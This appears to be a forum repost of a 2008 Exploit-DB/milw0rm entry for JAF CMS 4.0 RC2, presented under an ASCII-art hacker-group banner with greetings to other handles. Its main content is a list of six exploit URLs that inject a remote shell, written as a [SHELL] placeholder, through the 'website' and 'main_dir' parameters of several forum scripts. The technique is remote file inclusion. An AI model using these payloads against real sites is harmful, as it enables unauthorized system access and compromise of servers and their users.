Exploit JAF CMS 4.0 RC2 - Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5317
Проверка EDB
  1. Пройдено
Автор
CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1609 cve-2006-7128 cve-2006-7127
Дата публикации
2008-03-26
Код:
???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??                         [ Remote File Include ]                          ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : PitBull Crew           ? ?                                    ?
?   Script   : JAF-CMS 4.0 RC2        ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????
  
        http://localhost/path/module/forum/forum.php?website=[SHELL]         
        http://localhost/path/module/forum/forum.php?main_dir=[SHELL] 
        http://localhost/path/module/forum/headlines.php?website=[SHELL]
        http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
        http://localhost/path/module/forum/main.php?website=[SHELL]
        http://localhost/path/module/forum/main.php?main_dir=[SHELL]
   
??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, WizzKidd, Sad, S|AyER, Ehab, Tfaces, Guzman,
       Karlousha, Od3d99aa. Mark, Ramzi, Lust, DeaD, adal, xD

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-03-26]
 
Источник
www.exploit-db.com

Похожие темы